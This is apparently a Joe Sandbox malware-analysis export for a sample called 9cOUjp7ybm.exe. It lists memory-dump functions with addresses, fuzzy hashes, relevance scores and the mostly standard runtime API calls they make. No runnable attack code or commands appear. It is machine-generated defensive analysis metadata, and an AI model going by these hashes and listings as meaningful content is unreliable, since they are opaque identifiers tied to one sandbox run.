Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63bd2ae94ee1434e9248bdd05ceae172b98e2c335bfa8c5aee1af4a7d5257fe1
Instruction ID: 4e49d00ad09325e7f6451a10d3c481d15667bc48bcb9ce1f6a077ffae2e10e40
Opcode Fuzzy Hash: 63bd2ae94ee1434e9248bdd05ceae172b98e2c335bfa8c5aee1af4a7d5257fe1
Instruction Fuzzy Hash: 18320270514B198FC36ACF29C68052BBBF1BF86710B614A2ED6A787E90D776F844CB14

Function 0041DE30 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dbb2f320eea0c9dc878a6c49c52daa75a874102e62c1879da87a0feb4cb0159
Instruction ID: b4ffc51bdce93085ff3416038816008c665ab4d86dc2177ecff714aaca352b6a
Opcode Fuzzy Hash: 6dbb2f320eea0c9dc878a6c49c52daa75a874102e62c1879da87a0feb4cb0159
Instruction Fuzzy Hash: 6332C3F0A14B409FD3A1CF2DC841793BBE8AB4A710F15896EE5AEC7311D7746901CBA9

Function 003F63C0 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
Instruction ID: 91980ab9c83395c213c33e5f364b3640859b0060d5fc0d0bfb736ecff03a71dc
Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
Instruction Fuzzy Hash: 87F1BA356083458FC729CF29C88166BFBE6EFD8304F08882DE5D987751EA75E808CB56

Function 0040DDF0 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b78bb781b3b6ef422163dc69e0f1e15217c8ffd0916a4428c1e9023a162aa9
Instruction ID: 866facee161f63d3843c2de19a9870e583651ed11f91ec6c7548aca9e9b3d494
Opcode Fuzzy Hash: 20b78bb781b3b6ef422163dc69e0f1e15217c8ffd0916a4428c1e9023a162aa9
Instruction Fuzzy Hash: 1EB11575604201ABD7108F25EC41B1BBBE2EF89754F548A3EF8A4A73E1D7359C18CB46

Function 00405260 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18edf71ab7c4557d5fcde03e234477598ad2c4b0a424cc084650436352cd33b
Instruction ID: 8ae4139a7a1ee57e667f92e922780900f3702de276460d7886235f27d072b93b
Opcode Fuzzy Hash: a18edf71ab7c4557d5fcde03e234477598ad2c4b0a424cc084650436352cd33b
Instruction Fuzzy Hash: A57125B1D106258BCB24CF68C8926BB73B0FF55364B19012ADC96AB3C0F7789901CB95

Function 003F6CB0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88d76967b2daf3f2efff3a844aac06e3f491c903741e30a63c027bd60e8f0a4
Instruction ID: a3959c2dce5a44890eadd78ecfea8076dffd39e4de8dd004c9419256fd404f4d
Opcode Fuzzy Hash: a88d76967b2daf3f2efff3a844aac06e3f491c903741e30a63c027bd60e8f0a4
Instruction Fuzzy Hash: EFC17DB2A187458FC371CF28DC96BABB7E1BF85318F08492DD2D9C6242D778A155CB05

Function 0042CAB0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f0a244bfeedf4d2fe5c236b5ecc0ab223cf0718e73755616558d1f16e56004
Instruction ID: 92f17fade0c23e3d58089a69307f98310d675bc9be431f78441824d2aa53fc99
Opcode Fuzzy Hash: 31f0a244bfeedf4d2fe5c236b5ecc0ab223cf0718e73755616558d1f16e56004
Instruction Fuzzy Hash: 0C5136357093208FD7209F2ABCC156FB792EB87720F954A6ED89957391C335AC02C799

Function 00428A40 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0174b772800c3c7c2dde55edf2594ff59bb88d0dd10078834f033982e170eb99
Instruction ID: 6b2350d7547ca08adef2addc0e24b07de2f59ff7216ba4d1edc785221df2f349
Opcode Fuzzy Hash: 0174b772800c3c7c2dde55edf2594ff59bb88d0dd10078834f033982e170eb99
Instruction Fuzzy Hash: 35518EB16083548FE314DF29D49035FBBE1BBC4308F444A2EE4E583350E779D6088B86

Function 003D6E63 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45e5de18c62c5ef11a818dd649345c6e4072f57de5560c187fd8cc5db5970d8
Instruction ID: fc9b2fbdfab4c9e6437eb8afe22d687072bb5d3563c45dd59b5db8260e9c9319
Opcode Fuzzy Hash: c45e5de18c62c5ef11a818dd649345c6e4072f57de5560c187fd8cc5db5970d8
Instruction Fuzzy Hash: 2641CA399557428BDB2ADE38F6A85C6BFA4BE2235035C425DC8B28B742C3258492CF91

Function 00405D70 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36336d4cca3d322867e557288c4019493b1e22bbbc1b87fd4ee6ac83c9ea7e2
Instruction ID: 245dc019f625c99669d254eaa5e68d2b03bc3bc0d7a7aeb51f18b0fa7c75be00
Opcode Fuzzy Hash: a36336d4cca3d322867e557288c4019493b1e22bbbc1b87fd4ee6ac83c9ea7e2
Instruction Fuzzy Hash: 3F3124745057408BDB34DF24C8957ABB3B0EF81364F048A2EE8C5AB3C1E7388900CB9A

Function 003D6FC7 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6e413231f17479cbb3e44948bd4539d84d8f69a4f0dd54e396f8b8a1564795
Instruction ID: 7d952a950d14cce2e32779a30ffe1e8ece893fb217347fe9f8e4a8b189c6522c
Opcode Fuzzy Hash: eb6e413231f17479cbb3e44948bd4539d84d8f69a4f0dd54e396f8b8a1564795
Instruction Fuzzy Hash: 52310638116B818BCB06AF38F7B82C17FA47FAB214368179DD5A18B766C3159153CF91

Function 003D6428 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ed1be57d9bc1bdf966c4bc4fd16fe59d500d12862ad89900e111f8d544553c
Instruction ID: 15d86c099bd7773a91311d3b30e2db351ad715ed73e880caaab2c8d588d41573
Opcode Fuzzy Hash: c0ed1be57d9bc1bdf966c4bc4fd16fe59d500d12862ad89900e111f8d544553c
Instruction Fuzzy Hash: FA31A9358127128BCF02EE3896990C5BFB0BE2A260728579DCDA18B6A5C3244063CF82

Function 003F3670 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5304366060603d9e6070e924a72f504a79de3e323384e501256cdf50a4fd8c0
Instruction ID: 9fd40d4c1960a09690a7956df2c49e6614d8c8a03441a9831fb122f6a271fd85
Opcode Fuzzy Hash: a5304366060603d9e6070e924a72f504a79de3e323384e501256cdf50a4fd8c0
Instruction Fuzzy Hash: 94F02B3F75921D0BE311DD69ECC097BB396DBC6318B1D8138EA41E3701C574E906C2A0

Function 6CE22B29 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: 247cc700ffb986ed221f37ebd40b02461966140358f2c088683116852c383a7b
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: B8E08C32926238EBCB14CF98C904A8AB3FCEB48B24B2104AAB501D3601C274DE01C7C0

Function 6CE25518 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6CE2555C

Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27465
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27477
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27489
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE2749B
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274AD
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274BF
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274D1
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274E3
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274F5
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27507
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27519
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE2752B
Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE2753D

_free.LIBCMT ref: 6CE25551

Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B

_free.LIBCMT ref: 6CE25573
_free.LIBCMT ref: 6CE25588
_free.LIBCMT ref: 6CE25593
_free.LIBCMT ref: 6CE255B5
_free.LIBCMT ref: 6CE255C8
_free.LIBCMT ref: 6CE255D6
_free.LIBCMT ref: 6CE255E1
_free.LIBCMT ref: 6CE25619
_free.LIBCMT ref: 6CE25620
_free.LIBCMT ref: 6CE2563D
_free.LIBCMT ref: 6CE25655

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9f669ac714b081050a6241eda2d476b85a5e7babd470c28c5a344cdc4243c919
Instruction ID: f65c99ad02d5704e1c0550372b5432cb51f92d28b2da25613f497f0fb6fa3264
Opcode Fuzzy Hash: 9f669ac714b081050a6241eda2d476b85a5e7babd470c28c5a344cdc4243c919
Instruction Fuzzy Hash: 5A315C316052009FEB219A75E948FA673F9EF4032DF30895DE064DBB54DF78E9849B60

Function 6CE226F3 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CE22709

Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B

_free.LIBCMT ref: 6CE22715
_free.LIBCMT ref: 6CE22720
_free.LIBCMT ref: 6CE2272B
_free.LIBCMT ref: 6CE22736
_free.LIBCMT ref: 6CE22741
_free.LIBCMT ref: 6CE2274C
_free.LIBCMT ref: 6CE22757
_free.LIBCMT ref: 6CE22762
_free.LIBCMT ref: 6CE22770

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 31c32b2a3e3ed4be8922d899d960c0fd26f6516585dbea66a79624492fbf81eb
Instruction ID: 4bdbd78d6e420d61b112e36a293de28f37eddd6c59d12f1c5364dfae27dcc6c1
Opcode Fuzzy Hash: 31c32b2a3e3ed4be8922d899d960c0fd26f6516585dbea66a79624492fbf81eb
Instruction Fuzzy Hash: C4210A76910108AFCB02DF94C884EDD7BB8BF58254F50846AF5059F620DB75DA49DFC0

Function 6CE2435A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ext-ms-, xrefs: 6CE243C5
l l, xrefs: 6CE2435C
api-ms-, xrefs: 6CE243B1

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-$l l
API String ID: 0-4051029112
Opcode ID: eedbaa982b1a4ecab0bcafae5ee3adc596c937665b129391b26957e9bd40408f
Instruction ID: a8b5c52b80d9d2df8933f2222fdc0d990cdd15a52404dadbbdf27c04b3c5969c
Opcode Fuzzy Hash: eedbaa982b1a4ecab0bcafae5ee3adc596c937665b129391b26957e9bd40408f
Instruction Fuzzy Hash: DA21E771B46261ABCB128A298C84F4A7778AF1777CF350A23E815AB780D678ED0185E0

Function 6CE20CD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 6CE20D07
___except_validate_context_record.LIBVCRUNTIME ref: 6CE20D0F
_ValidateLocalCookies.LIBCMT ref: 6CE20D98
__IsNonwritableInCurrentImage.LIBCMT ref: 6CE20DC3
_ValidateLocalCookies.LIBCMT ref: 6CE20E18

Strings

csm, xrefs: 6CE20DAD

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3587f757451a3699664023cca5f93ba05e8f4004948babd4dc7806fd2b9568a8
Instruction ID: 7367f0a5e086b04da898835af5874eaa9e935942bd282f6a67fbd60c7c6f4933
Opcode Fuzzy Hash: 3587f757451a3699664023cca5f93ba05e8f4004948babd4dc7806fd2b9568a8
Instruction Fuzzy Hash: 58418134E012889FCF00CF69C890B9EBBB5AF4532CF348159E8149B791D73AEA15CB90

Function 6CE2369F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\9cOUjp7ybm.exe, xrefs: 6CE236A4
-8l, xrefs: 6CE236F0

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: -8l$C:\Users\user\Desktop\9cOUjp7ybm.exe
API String ID: 0-1601642273
Opcode ID: 144e491443d0a36ff5d715ced9e31366188119b2778d54a6cc0f80819b88a8f2
Instruction ID: eff8ab9eb223e5523e3c4f7a2d040317bdd943547b7921a9c90802a009e7c269
Opcode Fuzzy Hash: 144e491443d0a36ff5d715ced9e31366188119b2778d54a6cc0f80819b88a8f2
Instruction Fuzzy Hash: 66217FB1604209AFDB109E698D90F5B77BDAF1136C7344619F564D7B40EB29DC058FA0

Function 6CE275E7 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CE275AF: _free.LIBCMT ref: 6CE275D4

_free.LIBCMT ref: 6CE27635

Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B

_free.LIBCMT ref: 6CE27640
_free.LIBCMT ref: 6CE2764B
_free.LIBCMT ref: 6CE2769F
_free.LIBCMT ref: 6CE276AA
_free.LIBCMT ref: 6CE276B5
_free.LIBCMT ref: 6CE276C0

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction ID: 7e39eb4d194b737b3eceb0329c4f8813d59e9505696633f40ef7639a40cd040b
Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction Fuzzy Hash: C6119332580B04BBD721A7B0CC09FDBB7BC5F51704F50482DA2D96AA90DB3CF5095790

Function 6CE26700 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE26748
__fassign.LIBCMT ref: 6CE2692D
__fassign.LIBCMT ref: 6CE2694A
WriteFile.KERNEL32(?,6CE24EE3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE26992
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE269D2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE26A7A

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: a8db25b6de835e4d0ef090bc33e0ec612fd1842380852bb482d807d73315890d
Instruction ID: 1d1e079b9b04668b84b19837213af114fa70c25459107b32bcd392378f6aaa37
Opcode Fuzzy Hash: a8db25b6de835e4d0ef090bc33e0ec612fd1842380852bb482d807d73315890d
Instruction Fuzzy Hash: B3C180B5D052589FCB01CFA8C880AEDFBB9AF09318F28826AD855F7741D6359946CF60

Function 6CE211A7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CE20E75,6CE1FFA0,6CE1F9B9,?,6CE1FBF1,?,00000001,?,?,00000001,?,6CE2F120,0000000C,6CE1FCEA), ref: 6CE211B5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE211C3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE211DC
SetLastError.KERNEL32(00000000,6CE1FBF1,?,00000001,?,?,00000001,?,6CE2F120,0000000C,6CE1FCEA,?,00000001,?), ref: 6CE2122E

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 04c7074b698592e581808d6c8e137bc6f65ec21e7665a568cf45b35c1d6ef65d
Instruction ID: 973fdb435419fecfc48bf55ac7855b6b5c4a26a0e17d5e420c89d05086e7d1df
Opcode Fuzzy Hash: 04c7074b698592e581808d6c8e137bc6f65ec21e7665a568cf45b35c1d6ef65d
Instruction Fuzzy Hash: 83019E336096695EAB0506E56C88B9A36B4DB1767D330032EF52481BE0FB5BCE15A154

Function 6CE21323 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6CE213E4,00000000,?,00000001,00000000,?,6CE2145B,00000001,FlsFree,6CE2AD3C,FlsFree,00000000), ref: 6CE213B3

Strings

api-ms-, xrefs: 6CE21373

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: a5aa4b9051b02ea913e3cd9dfb79f93fed227bded74c4772a23bd2b758ce550e
Instruction ID: 781e23f9d9f31edc4d44a8e80f0b76e79de318447b45a202872f45f62c5d7ba9
Opcode Fuzzy Hash: a5aa4b9051b02ea913e3cd9dfb79f93fed227bded74c4772a23bd2b758ce550e
Instruction Fuzzy Hash: 6F118A32F856259BDB128B998C44B5D77B5AF02778F360210E911E7B80D779EE0086D1

Function 6CE219DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE2198C,?,?,6CE21954,?,00000001,?), ref: 6CE219EF
